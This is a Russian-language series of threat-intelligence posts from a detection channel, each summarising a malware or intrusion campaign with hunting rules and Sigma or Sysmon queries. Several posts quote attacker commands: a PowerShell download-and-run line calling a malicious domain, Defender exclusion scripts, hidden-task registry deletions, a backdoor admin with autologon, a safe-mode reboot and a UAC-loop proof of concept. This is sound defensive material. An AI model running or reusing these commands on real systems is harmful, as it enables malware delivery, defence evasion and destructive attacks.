Всем привет! 💻✌️

Давайте познакомимся с отчетом коллег из Esentire

👨‍💻 Как это работает?

ClickFix используется для доставки двух нагрузок: NetSupport Manager и Amatera Stealer

🔤Для доставки используется ClickFix, цель которого установить RMM - NetSupport Manager и Amatera Stealer

🔤В качестве нагрузки ClickFix используется mshta.exe, который запускает цепочку powershell-скриптов:

powershell.exe -nopROfi -ExEC UnRESTrictED -WINDOWSTYI HiD -ENc <BASE64>

powershell.exe -ENC <BASE64>

powershell.exe -NoProfile -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command <COMMAND>

Исследователи отмечают использование строки AMSI_RESULT_NOT_DETECTED как ключа для bxor и последующую перезапись функции AmsiScanBuffer.

🔤Результат цепочки скриптов - запуск .NET-based Downloader, который загружает, расшифровывает и запускает нагрузку с MediaFire

🔤Перед установкой NetSupport проверяется, принадлежит ли компьютер к домену, и есть ли на нем интересные файлы

🔭 Обнаружение и хантинг:

🔤 отслеживаем резолв mediafire.com
🔤 отслеживаем командлеты и строки в Powershell GetMappedFileName, clr.dll, ReadProcessMemory, PAGE_EXECUTE_READWRITE, WriteProcessMemory, AMSI_RESULT_NOT_DETECTED
🔤 поиск белых адресов в командлетах powershell
🔤 создание подозрительных ключей в HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

У The DFIR Report вышел новый отчет по кампании Lynx Ransomware

👨‍💻 Как это работает?

🔤Атака начинается со входа по RDP, при этом нет признаков брутфорса — злоумышленники используют уже валидные учётные данные
🔤Через несколько минут после получения доступа атакующие авторизовались на контроллере домена, используя учетную запись администратора
🔤Для закрепа создали несколько учетных записей и добавили их в админы домена
🔤Злоумышленники провели разведку сети: обнаружили виртуализацию и сетевые шары
🔤Чувствительные файлы были упакованы в архивы через 7-Zip и загружены на temp.sh
🔤На серверах резервного копирования были удалены задания бекапов и запущен Lynx Ransomware

Отдельно стоит отметить использование SoftPerfect Network Scanner

🔭 Обнаружение и хантинг:

🔤 добавление новых пользователей в привилегированные группы
🔤 создание учеток с атрибутом USER_DONT_EXPIRE_PASSWORD
🔤 создание файла netscan* - можем похантить в mft и usn
🔤 авторизации с белых адресов, LogonType 10 и 3
🔤 для YARA можем использовать строку из лицензионного файла SoftPerfect Network Scanner - network-scanner-license
🔤 обнаружение файлов с именем delete.me, которые NetScan создает при проверке записи в сетевых шарах. можем похантить в mft и usn
🔤запуск процесса с метаданными

Product: Network Scanner
Description: Application for scanning networks

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Обнаружена уязвимость CVE-2025-11001 в 7-Zip, позволяющая записывать файлы в произвольные места системы при распаковке архивов. Активно используется в фишинговых кампаниях

👨‍💻 Давайте посмотрим как работает:

🔤Злоумышленник создает специальный архив с символической ссылкой
🔤При распаковке 7-Zip создает ссылку на произвольную директорию (например, C:\Windows\System32)
🔤Файлы из архива записываются по пути ссылки, а не в папку архива (все файлы расположенные в папке с именем симлинка)
🔤Пользователь увидит остальные файлы (не расположенные в папке с именем симлинка)

🔭 Обнаружение:

🔤 обнаруживаем создание файлов процессом 7z*.exe, в подозрительных путях C:\Windows\, С:\Users\*\AppData\, C:\Program Files*\ и с опасными расширениями

🔤 анализируем несоответствие путей, отслеживаем создание файлов с разными путями одним процессом 7z*.exe
Можем брать,например, второй элемент списка из путей и сравнивать их

p.s. оба правила будут фолсить, дополнительно можем проверять, что у архива есть ADS с ZoneId, и если проведена инвентаризация - версию 7z

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из PT рассказали про фишинговую кампанию NetMedved, цель которой - установить NetSupport Manager

👨‍💻 Разберём интересный момент: в LNK вынесены проверки на выполнение в песочнице. Обычно такие проверки встречаются на 2–3 этапе, но здесь они — сразу в LNK.

🔤 жертвам рассылаются письма с вложенными архивами

🔤 в архиве находятся: LNK, DOCX и PDF — документы маскируются под деловую переписку российских компаний.

🔤LNK файл выполняет проверки на antisandbox:

проверка процессов для анализа программ

Get-Process | Where-Object {$_Name -match 'filemon|regmon|procexp|procexp64|t cpview|tcpview64|Procmon|Procmon64|vmmap|vmmap64|portmon|processlasso|Wireshark|Fiddler|ida|ida64|ImmunityDebugger|WinDump|x64dbg|x32dbg|OllyDbg|ProcessHacker'})

проверка логических процессоров

((Get-CimInstance Win32_Processor).NumberOfLogicalProcessors -lt 2)

проверка разрешения экрана

([System.Windows.Forms.Screen]:PrimaryScreen.Bounds.Width -lt 800) -or ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height  -lt 600))

🔤 Если проверки пройдены успешно, то создается ps1-файл в LocalAppData с именем сгенерированного GUID

$etdvmovzr = (Get-Item Env:LocalAppData).Value+\'+([guid]:NewGuid())+'.pS1';

🔤с удаленного ресурса загружается ps1-нагрузка и записывается в созданный GUID-файл. Запуск скрипта

irm 'metrics-strange.com/c626b76039054fe7899.ps1' > $etdvmovzr;saps 'powershell' -ArgumentList ('-NoProfile"'-ep"'bypass"."-WindO'HIDD':-File' $etdvmovzr); exit O }"

🔭 Обнаружение:

🔤 отслеживаем создание LNK-файлов в %temp%

ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename contains "\AppData\Local\Temp\" and TargetFilename endswith ".lnk"

🔤 отслеживаем аргументы powershell PrimaryScreen.Bounds.Width, PrimaryScreen.Bounds.Height, 'filemon|regmon|procexp|procexp64|tcpview|tcpview64|Procmon|Procmon64|vmmap|vmmap64|portmon|processlasso|Wireshark|Fiddler|ida|ida64|ImmunityDebugger|WinDump|x64dbg|x32dbg|OllyDbg|ProcessHacker'

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из PT рассказали про фишинговую кампанию NetMedved, цель которой - установить NetSupport Manager, в прошлый раз мы рассмотрели LNK-файл, сегодня давайте остановимся на NetSupport Manager

🔭 Обнаружение:

🔤 для работы создается служба Client32 с файлом *\NetSupport\NetSupport Manager\client32.exe

🔤 отслеживаем создание процессов с метаданными

Product: NetSupport Remote Control
Company: NetSupport Ltd

🔤 можем похантить файлы NSM.LIC и NSM.ini

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

PT выпустили описание техник APT31, которые активно используют скрытые задачи планировщика Windows

Для создания скрытой задачи необходимо удалить файл XML и ключ реестра SD (SecurityDescriptor) соответствующей задачи:

reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TEST_TASK" /v SD /f

del %SystemRoot%\System32\Tasks\TEST_TASK /f

🔭 Обнаружение :

🔤 следим за удалением ключей реестра

ProviderName="Microsoft-Windows-Sysmon" and EventId = 12 and EventType = "DeleteValue" and TargetObject = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\*\SD"

p.s. следует проверить конфиги средств сбора событий и DACL на куст реестра

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании

👨‍💻 Посмотрим TTP:

🔤Атака начинается с ClickFix (имитируется обновление системы: синий экран с процентами - всё привычно), в результате чего запускается удалённый скрипт через mshta.exe

🔤Приложение hta запускает powershell.exe с командлетами iex (irm https://example.com/asf)

🔤Теперь самое интересное. Скачанный ps1 начинает свою работу с повышения привилегий (UAC) и добавления исключений в Windows Defender

$uQVLE622ThHArk = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
$uQVLE622ThHArk +=
"; Add-MpPreference -ExclusionPath '$env:WINDIR"
$uQVLE622ThHArk +=
; Add-MpPreference -ExclusionPath '$env: TEMP"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env: USERPROFILE"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env:APPDATA"
$uQVLE622ThHArk += ";
Add-MpPreference -ExclusionPath '$env: LOCALAPPDATA"
$uQVLE622ThHArk += "; Add-MpPreference -ExclusionIpAddress '178.16.55.189', '94.154.35. 25'

🔤Для повышения привилегий атакующие запускают powershell.exe с аргументом -Verb RunAs

$aXNXjSqHUpLoYk = Start-Process powershell.exe
-ArgumentList "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass - Command
`$ErrorActionPreference='Stop'; $uQVLE622ThHArk" `
 -Verb RunAs `
 -PassThru

И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии

🔤Последним этапом идёт установка RAT или стилера

🔭 Обнаружение:

🔤 отслеживаем аргументы powershell Add-MpPreference, Set-MpPreference, -Exclusion*

🔤 отслеживаем создание новых значений в ключах реестра HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\

🔤 отслеживаем события
ProviderName = "Microsoft-Windows-Windows Defender/Operational" AND EventId=5007 AND NewValue contains "Microsoft\Windows Defender\Exclusions"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Разберём интересную технику загрузки кода в память explorer.exe

Атакующие могут злоупотреблять функционалом изменения иконок для директорий. Иконки хранятся в DLL, и если в DLL есть функция DllMain, то при выборе изображения код из этой функции будет выполнен.

🔭 Обнаружение:

🔤 Обнаружение может быть достаточно шумным. Рекомендуется отслеживать загрузку любых библиотек из директорий пользователя. Правило можно улучшить, добавив корреляцию со временем создания загружаемого файла

ProviderName="Microsoft-Windows-Sysmon" and EventId=7 
and Image endswith "explorer.exe"
and ImageLoaded startswith "C:\Users\" and Signed="false"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Группировка Bloody Wolf использует jar-файлы в фишинговых кампаниях в Центральной Азии

👨‍💻 Посмотрим TTP:

🔤Жертва получает вредоносное письмо с PDF-приманкой, оформление которой имитирует документы Министерства юстиции
🔤Пользователь открывает PDF и ему предлагается перейти по ссылке для загрузки материалов
🔤Перейдя по ссылке пользователь загружает вредоносный JAR-файл, цель которого - установка NetSupport RAT
🔤Для закрепа в JAR-файле предусмотрены 3 варианта:

bat в %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

@echo off
cd /d "C:\Users\Bruno\Documents\[Something]"
start "" "[net support executable].exe"

автозапуск в реестре

cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [something] /t REG_SZ /d "[path to net support executable]"

создание задачи

cmd.exe /c schtasks /TN "[Something]" /TR "[path to netsupport executable]" /SC ONLOGON /RL LIMITED /F /RU "%USERNAME%"

Видим, что используется нестареющая классика)

🔭 Обнаружение:

🔤 следим за запуском javaw.exe c jar-файлами из пользовательских директорий

javaw.exe -jar C:\Users\Administrator\Downloads
Ndec0d327c39044523564721608ab551fffeae7af144b9657c367cd47aeb16a7a
\dec0d327c39044523564721608ab551fffeae7af144b9657c367cd47aeb16a7a.jar

🔤 отслеживаем запуск дочерних процессов от родителя javaw.exe

🔤 можем похантить jar-файлы, у которых есть ADS - Zone.Identifier

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Nextron Systems поделились TTP группировки Silver Fox

Хакеры распространяли вредоносный инсталятор Telegram Desktop для установки ValleyRat, по средствам фишинга и рекламы

Судя по картинке, применяется огромная цепочка процедур из 14 шагов

👨‍💻 Посмотрим TTP:
🔤Жертва запускает вредоносный инсталлятор Telegram
🔤Малварь создает исключение в Windows Defender
🔤В C:\ProgramData\WindowsData дропается защищенный паролем архив и переименованный двоичный файл 7-Zip
🔤 Из архива извлекается исполняемый файл второго этапа men.exe (основной оркестратор) и настоящий инсталлятор Telegram
🔤 В %public%\WindowsData\ вредоносный men.exe создает ряд бинарей: для bypass uac, уязвимый драйвер Nvidia для EDR Silencer, vbe-файл для закрепа в задачи (WindowsPowerShell.WbemScripting.SWbemLocator) и еще один архив
🔤Файлы последнего архива извлекаются в %public%\WindowsData\, и содержат уязвимый к dll sideloading исполняемый файл для запуска ValleyRat

men.exe изменяет список управления доступом для %PUBLIC%\Documents\WindowsData\, чтобы администраторы не могли удалять файлы и каталоги по этому пути.

🔭 Для обнаружения nextron предложили несколько своих вариантов с sigma-правилами:
🔤 создание файлов в C:\ProgramData\WindowsData\
🔤 добавление диска C: в исключение Windows Defender
🔤 обнаружение запуска 7-Zip для извлечения защищенного архива

title: Password Protected Compressed File Extraction Via 7-Zip
description: Detects usage of 7zip utilities (7z.exe, 7za.exe and
7zr.exe) to extract password protected zip files.
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Description|contains: '7-Zip'
    - OriginalFileName:
      - '7za.exe'
  selection_password:
    CommandLine|contains|all:
      - ' -p'
      - ' x '
      - ' -o'
      - ' -y'
  condition: all of selection_*

🔤 создание и запуск подозрительных файлов exe,dll,sys,vbe в/из директории %PUBLIC%
🔤 создание задачи с исполняемым файлом в директории %PUBLIC%

title: Scheduled Task Creation With Command In Users Public Directory
description: Detects creation of a scheduled task whose action command
points to \Users\Public
detection:
  selection:
    EventID: 4698
    TaskContent|contains:
      - '\\Users\\Public\\'
      - '\\\\Users\\\\Public\\\\'
  condition: selection

🔤 создание службы с исполняемым файлом в директории %PUBLIC%

title: Service Creation In Users Public Directory
description: Detects creation of a service running from \Users\Public
detection:
  selection:
    EventID: 4697
    ServiceFileName|contains:
      - '\\Users\\Public\\'
      - '\\\\Users\\\\Public\\\\'
  condition: selection

следим за ключами реестра HKLM\SYSTEM\CurrentControlSet\Services\

🔤 изменение прав доступа на файлы и директории в %PUBLIC%

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Распространение вредоносов через USB-накопители остается актуальным способом. Цепочка заражения описана в отчете AhnLab и Google

👨‍💻 Как это работает?

🔤На USB-накопители размещается ярлык USB Drive.lnk и скрытые папки sysvolume и USB Drive
🔤LNK стартует VBS-скрипт из папки sysvolume (с именем вида u[6 цифр].vbs), который в свою очередь запускает BAT-файл с аналогичным именем из той же директории
🔤BAT открывает для пользователя директорию USB Drive, в которой хранятся оригинальные файлы. Далее, проверяется наличие dat-файла в текущей директории, и файла C:\Windows<SPACE>\System32\printui.dll. Обращаем внимание на наличие пробела в пути Windows<SPACE>
🔤Если C:\Windows<SPACE>\System32\printui.dll - отсутствует, то:

🔤 в Windows Defender добавляется исключение C:\Windows<SPACE>\System32
🔤 копирует легитимный C:\Windows\System32\printui.exe в C:\Windows<SPACE>\System32
🔤 копируется DAT-файл с USB-носителя в C:\Windows<SPACE>\System32\printui.dll
🔤 запускается C:\Windows<SPACE>\System32\printui.exe, который загрузит C:\Windows<SPACE>\System32\printui.dll
🔤 вредоносная DLL регистрируется в службу DcomLaunch, запускает майнер XMRig в %SystemDirectory%\wsvcz и заражает другие съемные накопители

🔭 Обнаружение:

🔤 отслеживаем запуск опасных расширений со съемных накопителей
🔤 отслеживаем запуск и создание файлов по маске \w?[0-9]{6}\.(vbs|dll|dat|bat)
🔤 отслеживаем загрузку в память ImageLoaded = "*\printui.dll" and Signed="false"
🔤 отслеживаем создание исключений в Windows Defender
🔤 отслеживаем наличие пробелов в путях файлов \s\\

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из ЛК поделились TTP хактивистских группировок 4BID, BO Team и Red Likho

Для подготовки инфраструктуры к уничтожению запускался ps1-скрипт, одна из возможностей которого создание локального пользователя с параметрами PasswordExpires, Disabled = FALSE и добавление его в группу локальных администраторов

$userName = "[REDACTED]"
$password = "[REDACTED]"
$domain = "."
$userExists = net user $userName 2>$null
$addUser = net user $userName $password /add
wmic useraccount where "name='$userName'" set PasswordExpires=FALSE | Write-Log
wmic useraccount where "name='$userName'" set Disabled=FALSE | Write-Log
$group = (Get-LocalGroup -SID "S-1-5-32-544").Name
net localgroup $group $userName /add | Write-Log

Далее, хост настраивается для автоматического входа с созданным пользователем

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "AutoAdminLogon" -Value "1" | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultUserName" -Value $userName | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultPassword" -Value $password | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultDomainName" -Value $domain | Write-Log

Второй индикатор подготовки к уничтожению — перевод системы в безопасный режим с сетью:

cmd.exe /Q /c bcdedit /set {current} safeboot network && shutdown -r -f -t 0 1> \Windows\Temp\WsMeHC 2>&1

🔭 Обнаружение:
🔤 мониторинг создания локальных пользователей и их добавления в группу администраторов
🔤 хантим ключи реестра SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
🔤 отслеживаем запуск bcdedit /set {current} safeboot network

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

В фишинговой кампании по распространению UDPGangster 🔫 злоумышленники использовали интересный способ закрепления в системе

👨‍💻 Как это работает?

Атакующие часто используют директорию автозагрузки пользователя. Путь к ней задаётся в реестре:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

Если изменить значение этого ключа — Windows начнёт запускать программы уже из нового пути, что позволяет скрытно выполнять бинарь при старте системы

🔭 Обнаружение:

🔤 отслеживаем изменения ключа реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

p.s. можем похантить, найдется что-то интересное...

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Помните, в одном из отчётов упоминалось, что атакующие при попытке UAC Bypass использовали запуск PowerShell-скрипта (.ps1) в цикле, пока пользователь не согласится 🔫

У этого приёма есть отдельное название — UAC Loop

👨‍💻 Как это работает:

Уведомление о повышении привилегий появляется у пользователя снова и снова до тех пор, пока он не нажмёт Да

Больше похоже на психологический террор)

POC код:

 do {
    try {
        Start-Process notepad.exe -Verb RunAs -ErrorAction Stop
        break
    } catch {
        Start-Sleep 1
    }
} while ($true)

🔭Обнаружение:

🔤Запуск consent.exe более одного раза, будет сильно фолсить
🔤Для powershell отслеживаем
Provider="Powershell" AND Eventid=800 AND EventData contains "Verb RunAs"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Атакующие загружали вредоносные расширения в браузер для кражи данных

👨‍💻 Как это работает?

В Chromium-based браузерах ранее поддерживался аргумент командной строки --load-extension, который позволял запускать браузер с указанием пути к расширению
Позднее данный аргумент был скрыт, однако его всё ещё можно было использовать, если отключить соответствующее ограничение с помощью флага:

--disable-features=DisableLoadExtensionCommandLineSwitch

Таким образом, атакующие могли перезапускать Chrome или Edge с уже загруженным вредоносным расширением без необходимости установки через официальный магазин

В актуальных версиях Chromium данный способ уже не работает

🔭 Обнаружение:

🔤 Хантим аргументы командной строки

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "chrome.exe" and CommandLine contains "--load-extension"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Интересный LPE, но что нам с этим делать?

🔭 Обнаружение:

🔤 утилита zabbix_get, как правило используется с сервера zabbix, который в большинстве своем развернут на Linux. Построим на этом детект

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and (Image endswith: '\zabbix_get.exe' or Description = "zabbix_sender.exe")

p.s. хосты админов могут фолсить

#detection@detectioneasy
#ttp@detectioneasy